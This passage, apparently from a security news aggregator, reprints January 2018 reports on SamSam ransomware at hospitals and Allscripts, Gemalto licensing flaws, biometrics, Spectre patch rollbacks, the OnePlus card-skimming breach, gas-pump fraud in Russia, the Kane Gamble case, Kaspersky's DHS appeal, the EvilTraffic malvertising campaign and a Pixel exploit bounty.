Long notes that when the hospital made the business decision to pay the ransom (set at 4 bitcoins, thought to be worth $55,000 at the time), the hospital believed that it could recover its files from backup, but that the time and cost involved made it more efficient to pay the ransom. Now he added, "Several days later it was learned that, though the electronic medical record backup files had not been touched, the core components of the backup files from all other systems had been purposefully and permanently corrupted by the hackers."

Forensic firm Pondurance suggested that no patient data had been stolen, while the FBI confirmed that the SamSam group are more interested in receiving the ransom than in harvesting patient data.

The more recent attack against Allscripts occurred late last week. Allscripts emailed its clients on Jan. 18: "...early on the morning of January 18, we became aware of a ransomware incident that has impacted our hosted Professional EHR service and our Electronic Prescription of Controlled Substances ("EPCS") service, which are hosted in our Raleigh and Charlotte, NC data centers. According to industry reports, we are one of dozens of companies impacted by this attack, which is a variant of the SamSam ransomware."

Next day another email stated, "Material progress has been made to restore service as we now have access to data and services that were previously subject to the SamSam malware. We are in the process of cleaning impacted systems and services to ensure they will be operational once we are able to bring the services back online."

There has been no mention of any ransom payment, and no public discussion of the attack from Allscripts. The information above comes from copies of the emails posted to Reddit.

If the malware really is a variant of the SamSam ransomware, then it marks a divergence from its usual use. CSO Online reported Saturday, "The variant of SamSam that infected Allscripts was a new variant unrelated to the version of SamSam that infected systems at Hancock Health Hospital in Greenfield, Indiana and Adams Memorial Hospital in Decatur, Indiana... Allscripts said that all appearance this was commodity malware and that the company wasn’t directly targeted."

The implication from 'material progress' having been made so quickly without any ransom payment suggests that restitution is coming from Allscripts' backups rather than from decryption keys. This further supports the description of the attack being a commodity malware attack rather than a targeted attack as with Hancock Health. In the targeted attack, the attackers destroyed backups before infecting files; in the Allscripts attack, backup files were left intact.

These differences make it uncertain at this stage whether the same cybercriminals were behind both attacks, or whether the attacks have come from separate groups. Certainly, the financial success of the targeted attack compared to the financial failure of the commodity attack justifies the targeted approach in criminal terms.

SecurityWeek has approached Allscripts for a comment on the attack, and will update this story with any response.


Gemalto Licensing Tool Exposes ICS, Corporate Systems to Attacks
22.1.2018 securityweek ICS

A significant number of industrial and corporate systems may be exposed to remote attacks due to the existence of more than a dozen vulnerabilities in a protection and licensing product from Gemalto.

Gemalto Sentinel LDK is a software licensing solution used by many organizations worldwide on both their enterprise and industrial control systems (ICS) networks. In addition to software components, the solution provides hardware-based protection, specifically a SafeNet Sentinel USB dongle that users connect to a PC or server when they want to activate a product.

Researchers at Kaspersky Lab discovered that when the token is attached to a device, the necessary drivers are installed – either downloaded by Windows or provided by third-party software – and the port 1947 is added to the list of exceptions in the Windows Firewall. The port remains open even after the USB dongle has been removed, allowing remote access to a system.Sentinel USB token makes devices vulnerable to remote attacks

Experts discovered a total of 14 vulnerabilities in Sentinel components, including ones that allow denial-of-service (DoS) attacks, arbitrary code execution with system privileges, and capturing NTLM hashes. Since port 1947 allows access to the system, these flaws can be exploited by a remote attacker.

Kaspersky decided to analyze the product after the company’s ICS CERT team repeatedly encountered it during penetration testing assignments.

Malicious actors can scan the network for port 1947 to identify remotely accessible devices or, if they have physical access to the targeted machine, they can connect the USB dongle – even if the computer is locked – in order to make it remotely accessible.

The Gemalto product also includes an API that can be used to remotely enable and disable the administrator interface and change settings, including proxy settings for obtaining language packs. Changing the proxy allows an attacker to obtain the NTLM hash for the user account running the licensing software process.

Eleven vulnerabilities were discovered by Kaspersky in late 2016 and early 2017, and three others were found by June 2017. Gemalto has been notified and the company has implemented fixes with the release of version 7.6, but Kaspersky is not entirely happy with how the vendor has handled the situation. The first round of flaws was only resolved in late June 2017 and Gemalto did not properly communicate to customers the risks posed by these vulnerabilities – several software developers using the license management solution told Kaspersky they had not been aware of the security holes and continued using vulnerable versions.

Related: Learn More at SecurityWeek’s 2018 ICS Cyber Security Conference

In addition to installing the latest version of the Sentinel driver, Kaspersky has advised users to close port 1947 if it’s not needed for regular activities.

While the exact number of devices using this Gemalto product is unknown, Kaspersky believes it could be millions. A 2011 study by Frost and Sullivan showed that the SafeNet Sentinel had a 40 percent share in the license control solutions market in North America and 60 percent in Europe.

The vulnerable Gemalto software is found in the products of several major companies, including ABB, General Electric, HP, Cadac Group, Siemens, and Zemax.

Last week, ICS-CERT and Siemens warned that more than a dozen versions of the SIMATIC WinCC Add-On were affected by three critical and high severity vulnerabilities introduced by the use of Gemalto software. Siemens said the flaws, two of which are related to how language packs are processed, allow DoS attacks and arbitrary code execution.

Siemens told customers that the vulnerable Gemalto software is used in SIMATIC WinCC add-ons released in 2015 and earlier.

“Given how wide spread this license management system is, the possible scale of consequences is very large, because these tokens are used not only in regular corporate environments, but also in critical facilities with strict remote access rules. The latter could easily be broken with the help of the issue which we discovered to be putting critical networks in danger,” warned Vladimir Dashchenko, head of the vulnerability research group at Kaspersky ICS CERT.


Can Biometrics Solve the Authentication Problem?
22.1.2018 securityweek Safety
Are Biometrics as a Form of Authentication Over-hyped and Unreliable?

When Apple introduced the Touch ID fingerprint access button, commentators believed it would kick-start the ever-promising, never-quite-delivering biometric market. But Touch ID was defeated by hackers within days. When Apple introduced the FaceID biometric, the same happened – it was defeated within weeks. In November 2017, F-Secure demonstrated that Android’s Trusted Face Smart Lock can be defeated by a selfie. Also in November, researchers at the University of Eastern Finland concluded that voice impersonators can fool speaker/voice recognition systems.

There is probably no physical biometric factor that has not been defeated by hackers or researchers. Which begs the question: are biometrics as a form of authentication over-hyped and unreliable? Can they possibly provide an alternative to the much denigrated password?

Biometrics in use

Large-scale use of biometric authentication is primarily tied to smartphones. The wide-range of sensors built into these handheld and ubiquitous devices make them an ideal tool for face and iris recognition (camera), voice (microphone), and touch (fingerprint). This authenticates the user to the device, allowing further authorized access to other devices via the phone (although this does not, in itself, confirm that it is the authenticated user still operating the phone).

Banks are increasingly using voice and face recognition via smartphones for mobile banking purposes. Barclays introduced phone-based voice authentication, and HSBC allowed selfie-based face authentication in 2016.

Biometrics are also used in stand-alone situations, where they can be used to access restricted buildings or rooms. For example, in December 2017, Los Angeles Airport started trialing facial biometrics to speed out-bound passenger flow. The passenger’s facial image is compared to the facial image captured during the immigration process to prove identity.

In such circumstances, biometrics are very popular; but we need to differentiate between consumer smartphone-based biometrics and corporate usage. Biometrics are not currently used widely within industry. The main reasons are cost, possible privacy issues, and because it cannot be guaranteed that every member of the workforce has a smartphone.

Biometric strengths

Biometric authentication has several distinct advantages over passwords. These include:

Ease of use – “Biometrics are incredibly popular with users,” explains Shane Young, president & CEO of inBay Technologies. “Inherent biological... features are convenient: they are part of who we are, always with us and in most cases, we don’t have to think too much to use them (unlike remembering a password).”

Numerous surveys have confirmed this. A July 2016 survey conducted by Visa said two-thirds of Europeans would welcome the use of biometrics in payments. An August 2017 survey by Unisys suggests that 68% of users would trust organizations more if they were to use biometric authentication; 63% believe it is more secure than PIN and password; and 57% believe fingerprints to be the most secure form of authentication.

Can’t be lost – Associated with ‘ease of use’ is the idea that, unlike passwords, biometrics can be neither lost nor forgotten because the user is the biometric. This is true, but needs two qualifications. Firstly, if the biometric device is a smartphone, then the phone itself can – and often is – lost or stolen. Secondly, like a password, it is the device that is authenticated at a point in time. Subsequent use of an authenticated device could be by anyone. In reality, the ‘cannot-be-lost’ argument offers little advantage for smartphone biometrics over passwords other than it is easier to forget a complex password than to lose a personal device, and it is easier to use than inputting a complex password.

Automatically unique – Biometrics are automatically unique to each user. This argument might not hold up against detailed scientific analysis – even fingerprints cannot be guaranteed to be 100% unique. Voices can be imitated and twins can have identical faces – but in general, the risk of such ‘collisions’ occurring naturally is very small.

Biometric Weaknesses

Biometric authentication also has several weaknesses. These include:

Additional cost – A biometric solution cannot be implemented without incurring additional cost. “Anytime you require hardware, you incur additional cost – both monetary costs and costs in convenience (and therefore, cost to user adoption),” explains Ian Paterson, CEO of Plurilock. “Fingerprints require fingerprint readers, facial recognition requires special infrared cameras to work well, and retinal scans are even more cumbersome.”

Susceptibility to cloning or coercion – No biometric has yet proven itself to be proof against cloning. “Mainstream biometrics really means mobile devices, where – for the most part – they have only proven reliable enough at scale to be a convenience feature, used in parallel with the passcode as backup,” says security researcher and consultant, Stewart Twynham. “Even Tim Cook’s keynote announcement of Face ID came with the caveat that you should protect your data with a passcode if you have an ‘evil twin’.”

The implication is that biometrics are only as strong as the built-in biometrics found in the majority of contemporary smartphones – and these biometrics are routinely spoofed by researchers and hackers within days or weeks of their release.

“Whether a particular biometric method is useful or not depends on the sensor quality and ease of duplicating a particular biometric,” comments Jarno Niemela, lead researcher at F-Secure Labs. “For example fingerprints are a field where the attacker has significant advantage, since they are easy to copy and can be obtained from about anything that a person has been handling, or even from a photo.”

A related weakness in smartphone-based biometrics comes with the nature of smartphones – their mobility. This could allow a physical attacker to coerce the user into authenticating the device remotely. Since it is the device rather than the user of the device that is authenticated for mobile apps (whether they are banking apps or corporate access), a physical attacker such as a burglar could employ user-coercion (in crypto terms, aka ‘rubber-hose decryption’) to defeat biometric authentication.

Difficult to change – Despite the apparent strength of their apparent immutability, it is possible that biometric templates may need to be changed – but this is considerably more complex and costly than simply changing a password. There are two primary scenarios: theft of the biometric templates, and the aging of the user.

“Biometric data,” comments Carl Leonard, principal security analyst with Forcepoint, “is arguably more valuable than passwords since biometrics are, on the whole, immutable. The breach of the US Office of Personnel Management in 2015,” he adds, “included personal data of individuals including fingerprints.”

“The big problem with biometrics,” says Joseph Carson, chief security scientist at Thycotic, “is when they are compromised you cannot change them; it is like a hard-coded password which is a bad idea to use in today’s security world.”

The second scenario is an unknown quantity. Biometric characteristics actually do change over time. For example, fingerprints get worn through incessant use and/or injury, and voices change with age and illness. Where biometrics are already in use, their use is too recent to know whether this will prove a problem over time. Machine learning techniques could be used to adapt the template slowly with minute changes as they occur, but this simply adds more complexity and cost to the solution.

Privacy push-back – Despite consumer acceptance of smartphone-based biometrics, there is less overwhelming acceptance from corporate users. Many such users are unhappy about handing permanent personal data to what might prove to be a temporary employer. Such personal and perhaps conflicting attitudes to the private nature of biometrics are reflected in some contemporary legal concerns.

For example, comments Darren Abernethy, senior global privacy manager at TrustArc, “Some laws, such as the EU’s rapidly approaching General Data Protection Regulation (GDPR, which takes effect May 25, 2018), treat newly defined ‘biometric data’ as in essence sensitive personal information (SPI). The mandatory use of biometric data for authentication purposes creates the ironic situation where an individual must offer sensitive information – and likely separately provide explicit consent for its processing – in order to access a particular piece of hardware/software that itself may not otherwise contain SPI.”

This even tips over into constitutional issues. “There is a relevant Constitutional Fifth Amendment consideration with biometric data as well,” adds Abernethy; “namely, that whereas the government forcing an individual to reveal a traditional text-based password would amount to impermissible compelled testimonial self-incrimination, the same is not true with respect to a fingerprint.” In law enforcement scenarios, biometric authentication of smartphones is less secure than ‘forgettable’ passwords, since the user can be compelled to unlock the phone with biometrics; but not with a password.

Biometric Viewpoints

For at least a decade, each new year has started with predictions that this will be the year in which biometrics takes over authentication. It hasn’t happened yet. Nevertheless, the obvious advantages of biometrics remain compelling. The predictions continue; but have become more tempered.

“In 2018,” TrustArc’s Abernethy told SecurityWeek, “we’ll see less emphasis on traditional passwords and more on ways to achieve security via 2-factor authentication techniques involving biometric solutions like voice recognition, facial scans and fingerprints. For security vendors, the storage and record-keeping stakes are higher to protect biometric data because contrary to a credit card number that can be discontinued, you can’t replace a person’s facial structure with a new one once a facial scan is compromised.”

The biggest advantage is that biometrics reduce user ‘friction’; that is, the amount of effort required to properly authenticate yourself before using a system. The greater the friction, the greater the likelihood that the user will try to circumvent the controls that inhibit easy working. Biometrics do not eliminate friction, but they drastically reduce it.

The biggest disadvantages include cost, complexity, and a lack of clear proof that biometrics cannot be circumvented or defeated. More sophisticated biometric sensor devices can improve their reliability, but that will always come with a cost. “Next improvement in fingerprint scanning,” comments F-Secure’s Niemela, “will be sensors that are capable of also identifying the blood vessels in fingers, in which case just duplicating a visible print will not be enough.”

A 3D facial recognition system with infrared scanning would also improve facial scans. “With infrared cameras,” he adds, “cold objects (such as a photo image) will not show at all, or at least not correctly; and even a mask will very likely present a distorted thermal image.”

The improving technology of biometric scanners can be seen in Microsoft’s Windows Hello facial recognition system. In December 2017, researchers demonstrated that specially printed face images could defeat Microsoft’s ‘near infrared’ imaging in Windows 10 versions 1511 and 1607 – but not in the latest 1703 and 1709 versions.

Nevertheless, the continuing discussion over whether biometrics provide an adequate alternative, or addition, to passwords to solve the authentication problem ignores one underlying issue. Regardless of whether authentication is by either or both methods, it is a point-in-time authentication. Neither can ensure that the current user is the originally authenticated user. Current thinking is that this can be best solved by continuous and passive biometric behavioral user monitoring – which, notes Plurilock’s Paterson – has the additional advantage of not requiring any extra hardware.

Behavioral biometrics aggregates a potentially wide-range of features that can be gathered passively from each individual user. Some of these have been used by security officers for many years. For example, if the IP address of a local employee suddenly switches to Russia or China, the system can be fairly certain that it is not the legitimate user, and can block further access.

New behavioral biometric applications are adding additional options, such as the user’s keyboard cadence and mouse gestures. How many different ‘biometrics’ are included in such authentication can be tailored to the system being accessed: particularly sensitive areas of the environment can require additional continuous authentication.

It is a new approach that is yet to be proven over time or at scale – but it promises much. If the user is continuously monitored, it reduces the reliance on the initial authentication. This cannot be eliminated, but could be designed to reduce user friction on access. Less strong passwords or more basic fingerprint or face scanners could be used, with the knowledge that any intruder will be immediately recognized by the behavioral biometrics.

It is possible that we are entering a new debate before the old one is settled. It could be that the debate will become one of whether passwords or static biometrics should be paired with continuous behavioral biometrics.

The argument is similar to whether perimeter defenses should be replaced by incident response defenses. In this analogy, static passwords or biometrics are akin to perimeter defenses (anti-virus and firewalls); while behavioral monitoring is akin to network anomaly detection. The answer is the same in each case: you need both defenses, and you need both methods of authentication to remain secure.

“The premise of [static] biometric authentication is a powerful and effective security measure,” summarizes James Romer, EMEA chief security architect at SecureAuth. “But It is important to remember that authentication via facial recognition is not new and that no security measure is a silver bullet. No single authentication technique is beyond the reach of cyber criminals. Devices will be hacked and sensors will be tricked. It is important to layer such technology with adaptive authentication methods, such as IP reputation, phone number fraud prevention capabilities or behavioral biometrics. Effective security depends on layers.”

The bottom-line is that authentication is a risk valuation. Individual security officers need to balance the increased friction and cost of multiple layers of authentication, including passwords and/or biometrics and ongoing behavioral biometrics, to the risk involved to their own data in their own environment. What might be the right solution for one organization or environment might be the wrong solution for another.


Red Hat Pulls Spectre Patches Due to Instability
22.1.2018 securityweek
Vulnerebility
Red Hat has decided to pull microcode patches for one variant of the Spectre exploit after users complained that updates had caused their systems to stop booting.

Red Hat was among the first vendors to release mitigations for the CPU attack methods known as Spectre and Meltdown. In addition to kernel updates, users of the Linux distribution have been provided microcode updates that can be applied non-persistently using the microcode_ctl mechanism.

By placing the microcode in /lib/firmware/, the update is applied each time the system boots. However, one of the Spectre mitigations has been causing problems and Red Hat has decided to remove it.

The Meltdown attack relies on one vulnerability tracked as CVE-2017-5754. There are two main variants of the Spectre attack: one uses CVE-2017-5753 (Variant 1) and the other one CVE-2017-5715 (Variant 2).

Red Hat determined that the mitigations included in its microcode_ctl and linux-firmware packages for CVE-2017-5715 have caused problems for some users, which is why the latest versions of these packages do not address this variant of the Spectre exploit.

“Red Hat is no longer providing microcode to address Spectre, variant 2, due to instabilities introduced that are causing customer systems to not boot,” Red Hat said. “The latest microcode_ctl and linux-firmware packages are reverting these unstable microprocessor firmware changes to versions that were known to be stable and well tested, released prior to the Spectre/Meltdown embargo lift date on Jan 3rd.”

Red Hat has advised customers to protect their devices against attacks by obtaining updated microcode provided by CPU vendors as system firmware updates. Unlike microcode applied via the microcode_ctl mechanism, system firmware updates represent a more permanent solution.

The Meltdown and Spectre patches are believed to be efficient in protecting against attacks. However, many of the updates have turned out to be unstable and industrial control systems (ICS) vendors have advised customers not to apply them before conducting thorough tests.

The updates initially released by Microsoft caused some systems using AMD processors to stop booting. Some systems running Ubuntu also failed to boot after Canonical’s first round of updates was installed.

Intel itself said the microcode updates it released in response to Meltdown and Spectre caused some systems to reboot more often. VMware has decided to delay new releases of microcode updates until Intel addresses these problems.


40,000 Potentially Impacted in OnePlus Payment System Hack
22.1.2018 securityweek Incindent
Up to 40,000 OnePlus customers may have been impacted after attackers managed to compromise the company’s payment page.

In a Friday post on the OnePlus forums, the Chinese smartphone company confirmed the attack and also revealed that the attackers managed to inject rogue code into its payment page, allowing them to steali credit card information enteredin by users.

The company launched an investigation last week, after some of its users started complaining about fraudulent transactions occurring on their credit cards following purchases made on oneplus.net.

“We are deeply sorry to announce that we have indeed been attacked, and up to 40k users at oneplus.net may be affected by the incident. We have sent out an email to all possibly affected users,” a company’s employee said in a forum post.

The malicious script, the employee revealed, was designed to capture and send data directly from the user's browser. The script has been removed, the compromised server quarantined, and relevant system structures have been reinforced, the company says.

All OnePlus users who entered credit card information on the oneplus.net website between mid-November 2017 and January 11, 2018, may be impacted by the breach. The hack happened around the same time OnePlus 5T, the latest flagship smartphone from the Chinese maker, was launched.

Immediately after being alerted on the incident, the company also suspended credit card payments on its website, but continued to support PayPal payments.

The malicious code injected in the payment page was designed to steal credit card information such as card numbers, expiry dates, and security codes that the users would enter on the website during the compromise period.

According to OnePlus, the incident didn’t impact users who paid via a saved credit card. Users who paid via the "Credit Card via PayPal" method and those who used PayPal to pay should not be affected either.

“We cannot apologize enough for letting something like this happen. We are working with our providers and local authorities to better address the incident. We are also working with our current payment providers to implement a more secure credit card payment method, as well as conducting an in-depth security audit,” the OnePlus employee said.

Not only should enterprises assume they have been or will be breached, but also should savvy consumers assume their financial data is bound to be compromised, Tyler Moffitt, Senior Threat Research Analyst, Webroot, pointed out in an emailed statement to SecurityWeek. Thus, Moffitt encourages users to take steps to be warned when unauthorized transactions occur on their accounts.

“Additionally, when online shopping, it is inherently more secure for consumers to use their PayPal accounts than enter their credit card data upon checkout – it is best practice to enter credit card information as rarely as possible. Most merchants have PayPal, Masterpass or Visa Checkout options available, which are more secure payment protocol alternatives,” Moffitt concluded.


Hacker infected pumps at gas-stations in Russia in a profitable fraud scheme
22.1.2018 securityaffairs Hacking

Authorities discovered a fraudulent scheme involving dozens of gas-station employees who installed malicious programs on electronic gas pumps to cheat customers
Russian law enforcement investigated fraudulent activities involving gas-station payment systems.

Authorities discovered a fraudulent scheme involving dozens of gas-station employees who installed malicious programs on electronic gas pumps to trick customers into paying for more fuel than they pumped into their vehicles.

The software allows gas-station employees to deliver between 3 to 7 percent less per gallon of pumped gas.

The scam shorted customers between 3-to-7 percent per gallon of gas pumped.

“At dozens of gas stations owned by the largest oil companies, FSB officers identified malicious computer programs, thanks to which the owners of cars quietly missed the fuel. At times, “underweight” was up to 7% of the amount of gasoline that was being refueled into the tank. Identify the virus was almost impossible. Their creator and distributor was detained.” reported media outlet Rosbalt.

On Saturday, Russian Federal Security Service (FSB) arrested the hacker Denis Zayev. The man was charged with the creation of several programs designed for such kind of frauds.

Authorities revealed that the programs were found only on gas stations in the south of the country.

According to the authorities, the man was selling the software to gas-station employees. involved in the fraud scheme. Zayev was sharing profits with gas-station employees, it has been estimated that the fraud allowed the hacker and employees to earn “hundreds of millions of rubles.”

The malicious software was undetectable by inspectors and oil companies that monitor gasoline inventory remotely.

“At dozens of gas stations, malicious programs were discovered, which made it unnoticeable for customers to undercharge fuel when refueling their cars. “A giant scam covered almost the entire south of Russia,” viruses “were found in dozens of gas stations in the Stavropol Territory, Adygea, Krasnodar Territory, Kalmykia, several republics of the North Caucasus, etc.” continues the Rosbalt.”A whole network was built to steal fuel from ordinary citizens – they did not bear any financial loss, “the source said. “

Zaiev’s software was very sophisticated programs that were injected both into the software of the pumps and into the cash register to modify records.

The Rosbalt provided details about the way the programs worked. Every morning, gas-station employees left one of the reservoirs empty (for example, under the guise of maintenance). When a customer made a purchase, the software automatically undercharged him from 3% to 7% of the amount of gasoline purchased. The meter on the column was instructed to display the clients to show that the entire volume of paid fuel was poured into the tank. The stolen gasoline was automatically sent to the tank left empty. The malware virus erased any track of this operation.

The fuel was collected in the tank to be sold later by scammers that shared the profits of the sale.

Vulnerabilities and cyber attacks involving systems at gas-stations are not a novelty.

In January 2014, a criminal organization hit gas station ATMs located in South America. The gang used Bluetooth-enabled skimmers to steal 2 million dollars from customers.

Early 2015, experts at Rapid7 revealed that more than 5000 Automated tank gauges (ATGs) used to prevent fuel leaks at gas stations in US were vulnerable to remote cyber attacks.
gas-stations


UK Teen Gained Access to CIA Chief's Accounts: Court
22.1.2018 securityweek BigBrothers
A British teenager managed to access the communications accounts of top US intelligence and security officials including the then CIA chief John Brennan, a London court heard Friday.

Kane Gamble, now 18, was aged 15 and 16 when, from his bedroom in Coalville, central England, he managed to impersonate his targets to gain highly sensitive information.

"Kane Gamble gained access to the communications accounts of some very high-ranking US intelligence officials and government employees," prosecutor John Lloyd-Jones told England's Old Bailey central criminal court. "He also gained access to US law enforcement and intelligence agency networks."

Gamble has admitted 10 offences against the computer misuse act, between June 2015 and February 2016, and is awaiting sentencing.

The court heard how the teenager founded the group Crackas With Attitude (CWA), who used "social engineering" -- manipulating call centres and help desks into divulging confidential information -- which they then exploited.

Gamble impersonated Brennan in calls to the telecommunications companies Verizon and AOL, although in one attempt, he stumbled on a question about Brennan's first pet.

Several sensitive documents were reportedly obtained from Brennan's private email inbox and Gamble managed to get information about military and intelligence operations in Iran and Afghanistan.

"It also seems he was able to successfully access Mr Brennan's iCloud account," the prosecutor said.

Gamble called AOL and initiated a password reset, took control of Brennan's wife's iPad.

- 'I own you' -

Gamble also targeted the then US secretary of homeland security Jeh Johnson and made calls to his phone number.

He left Johnson's wife a voicemail saying "Am I scaring you?" and managed to get a message to appear on the family television saying: "I own you".

Other targets included the then US president Barack Obama's deputy national security adviser Avril Haines, his senior science and technology adviser John Holdren, and FBI special agent Amy Hess.

Gamble gained extensive unauthorised access to the US Department of Justice network and was able to access court case files, including on the Deepwater oil spill.

He boasted that he had a list of all Homeland Security employees.

Gamble gave some of the material he managed to access to WikiLeaks.

He was arrested at his home on February 9 last year at the request of the FBI.

He claimed he was motivated to act out of support for the Palestinians, and due to the United States "killing innocent civilians", the prosecutor said.

Gamble, wearing a black jacket, spoke only to confirm his name, mumbling "yes", and sat in the court next to his mother.

He will be sentenced at a date yet to be fixed.


Kaspersky Files Injunction to Expedite Appeal Against DHS Ban
22.1.2018 securityweek BigBrothers
Kaspersky Lab last week filed a motion for a preliminary injunction as part of its appeal against the U.S. Department of Homeland Security’s decision to ban the company’s products in federal agencies.

Kaspersky’s appeal targets the DHS’s Binding Operational Directive (BOD) 17-01, which the agency issued in September in response to concerns that the company may be aiding Russia’s espionage efforts. President Donald Trump reinforced the ban in mid-December with the National Defense Authorization Act for FY2018.

The security firm filed a lawsuit against the U.S. government shortly after the president signed the bill, arguing that the ban is unconstitutional as it infringes the company’s due process rights. Kaspersky believes the DHS should have given it the opportunity to view the information obtained by the agency before the directive was issued.

“[Kaspersky] has made this filing in hopes that the court will address and resolve the appeal expeditiously in light of the BOD’s damage to the company,” Kaspersky told SecurityWeek.

“The company asserts that the DHS decision is unconstitutional and relied on subjective, non-technical public sources, such as uncorroborated and often anonymously sourced media reports, related claims, and rumors. Furthermore, DHS has failed to provide the company adequate due process to rebut the unsubstantiated allegations underlying the BOD and has not provided any evidence of wrongdoing by the company,” it added.

When it announced the lawsuit, Kaspersky said it had voluntarily reached out to the DHS in July and offered to assist with any investigation into the company and its products. While the agency seemed to appreciate the offer, it did not follow-up and instead issued the controversial directive without warning.

The security firm said that while only a relatively small percentage of its revenue comes from the U.S. government, the DHS’s actions have had a negative impact on sales in other sectors, in both the United States and other countries.

The accusations against Kaspersky Lab stem from the connection between Eugene Kaspersky, the company’s founder and CEO, and Russian intelligence.

“Dissuading consumers and businesses in the United States and abroad from using Kaspersky Lab products solely because of its geographic origins and without any credible evidence does not constitute a risk-based approach to cybersecurity and does little to address information security concerns related to government networks,” Mr. Kaspersky said when the appeal was filed.

Kaspersky has attempted to clear its name by launching a new transparency initiative that involves giving partners access to source code and paying significantly larger bug bounties for vulnerabilities found in the firm’s products.

It has also attempted to provide a logical explanation over accusations that its software had been exploited by Russian hackers to steal data belonging to the U.S. National Security Agency (NSA) from a contractor’s device.


Op EvilTraffic CSE CybSec ZLAB Malware Analysis Report – Exclusive, tens of thousands of compromised sites involved in a new massive malvertising campaign  Virus
22.1.2018 securityaffairs   Operation EvilTraff

Malware experts at CSE Cybsec uncovered a massive malvertising campaign dubbed EvilTraffic leveraging tens of thousands compromised websites. Crooks exploited some CMS vulnerabilities to upload and execute arbitrary PHP pages used to generate revenues via advertising.
In the last days of 2017, researchers at CSE Cybsec observed threat actors exploiting some CMS vulnerabilities to upload and execute arbitrary PHP pages used to generate revenues via advertising. The huge malvertising campaign was dubbed EvilTraffic

The compromised websites involved in the EvilTraffic campaign run various versions of the popular WordPress CMS. Once a website has been compromised, attackers will upload a “zip” file containing all the malicious files. Despite the “zip” file has different name for each infection, when it is uncompressed, the files contained in it have always the same structure. We have found some of these archives not used yet, so we analyzed their content.

The malicious files are inserted under a path referring probably different versions of the same malware (“vomiu”, “blsnxw”, “yrpowe”, “hkfoeyw”, “aqkei”, “xbiret”, “slvkty”).

Under this folder there are:

a php file, called “lerbim.php”;
a php file, that has the same name of the parent dir; it has initially “.suspected” extension and only in a second time, using “lerbim.php” file, it would be changed in “.php” file;
two directories, called “wtuds” and “sotpie”, containing a series of files.
An example of this structure is shown in the following figure:

EvilTraffic

The main purpose of the “malware” used in the EvilTraffic campaign is to trigger a redirecting chain through at least two servers which generate advertising traffic.

The file “{malw_name}.php” becomes the core of all this context: if it is contacted by the user through the web browser, it redirects the flow first to “caforyn.pw” and then to “hitcpm.com”, which acts as a dispatcher to different sites registered to this revenue chain.

EvilTraffic

These sites could be used by attackers to offer commercial services that aim to increase traffic for their customers, but this traffic is generated in an illegal way by compromising websites. The sites could host also fraudulent pages which pretend to download suspicious stuff (i.e. Toolbars, browser extensions or fake antivirus) or steal sensitive data (i.e. credit card information).

In order to increase the visibility of the web, the compromised sites must have a good page-rank on search engines. So, the malware performs SEO Poisoning by leveraging on wordlist containing the trending searched words

The population of the compromised site with the wordlists and their relative query results is triggered contacting the main PHP using a specific User-Agent on a path “{malw_name}/{malw_name}.php?vm={keyword}”.

Researchers from CSE CybSec ZLab discovered roughly 18.100 compromised websites.

While researchers were analyzing the EvilTraffic malvertising campaign, they realized that most of the compromised websites used in the first weeks of the attacks have been cleaned up in the last days. just in one week, the number of compromised websites dropped from around 35k to 18k.

According to Alexa Traffic Rank, hitcpm.com is ranked number 132 in the world and 0.2367% of global Internet users visit it. Below are reported some traffic statistics related to hitcpm.com provided by hypestat.com

Daily Unique Visitors 1,183,500
Monthly Unique Visitors 35,505,000
Pages per visit 1.41
Daily Pageviews 1,668,735
The analysis of the traffic shows an exponential increase in the traffic during October 2017.

Experts discovered that crooks behind the Operation EvilTraffic used a malicious software to hijack traffic, it acts as brows a browser hijacker. The malware is distributed via various methods, such as:

Attachment of junk mail
Downloading freeware program via unreliable site
Open torrent files and click on malicious links
By playing online games
By visiting compromised websites
The main purpose of the malware is to hijack web browsers changing browser settings such as DNS, settings, homepage etc. in order to redirect as more traffic as possible to the dispatcher site.

Further technical details about this campaign, including IoCs, are available in the report titled:

“Tens of thousands of compromised web sites involved in new massive malvertising campaign”


Google awarded Chinese hacker record $112,500 for Android exploit chain
22.1.2018 securityaffairs Android

Google has awarded a record $112,500 to a security researcher for reporting an exploit chain that could be used to hack Pixel smartphones.
Last week the Google disclosed the technical details of the exploit chain that was devised in August 2017 by the Guang Gong from Alpha Team at Qihoo 360 Technology. The exploit chain triggers two vulnerabilities, CVE-2017-5116 and CVE-2017-14904, researchers submitted it through the Android Security Rewards (ASR) program.

“The exploit chain includes two bugs, CVE-2017-5116 and CVE-2017-14904. CVE-2017-5116 is a V8 engine bug that is used to get remote code execution in sandboxed Chrome render process. CVE-2017-14904 is a bug in Android’s libgralloc module that is used to escape from Chrome’s sandbox. Together, this exploit chain can be used to inject arbitrary code into system_server by accessing a malicious URL in Chrome.” reads the analysis published by Google.

Android%20exploit%20chain

Chaining the vulnerabilities the attackers can remotely inject arbitrary code into the system_server process when a malicious URL in Chrome is accessed.

In an attack scenario, the victims can be tricked into clicking on such a URL by hackers that can fully compromise their mobile device.

Gong was awarded $105,000 for this exploit chain, he received also an additional award of $7500 through the Chrome Rewards program.

Google addressed the flaws as part of Google Android ‘s December security bulletin that addressed a total of 42 bugs.

Pixel mobile devices and partner devices using A/B updates will automatically install the security updates that fixed the flaws.

“The Android security team responded quickly to our report and included the fix for these two bugs in the December 2017 Security Update. Supported Google device and devices with the security patch level of 2017-12-05 or later address these issues.” concluded Google.

The overall ASR payout rewards is over $1.5 million to date, with the top research team earning $300,000 for 118 vulnerability reports.


A hospital victim of a new SamSam Ransomware campaign paid $55,000 ransom
21.1.2018 securityaffairs
Ransomware

The Samsam Ransomware made the headlines in the first days of 2018, the malicious code infected systems of some high-profile targets, including a hospital that paid a $55,000 ransom.
The SamSam ransomware is an old threat, attacks were observed in 2015 and the list of victims is long, many of them belong to the healthcare industry.

Among the victims of the Samsam Ransomware there is the MedStar non-profit group that manages 10 hospitals in the Baltimore and Washington area. Crooks behind the attack on MedStar requested 45 Bitcoins (about US$18,500) for restoring the encrypted files, but the organization refused to pay the Ransom because it had a backup of the encrypted information.

In April 2016, the FBI issued a confidential urgent “Flash” message to the businesses and organizations about the Samsam Ransomware, why it is so dangerous?

Back to the present, the Samsam Ransomware made the headlines in the first days of 2018, the malicious code infected systems of some high-profile targets, including hospitals, an ICS firm, and a city council.

According to Bleeping Computer, the malware was used in attacks against the Hancock Health Hospital and the in Indiana, the , cloud-based EHR (electronic health records) provider , and an unnamed ICS firm in the US.

In one case, managers of the Hancock Health hospital decided to pay the $55,000 ransom.

“Hancock Health paid a $55,000 ransom to hackers to regain access to its computer systems, hospital officials said.Part of the health network had been held hostage since late Thursday, when ransomware locked files including patient medical records.” reported the Greenfield Reporter.

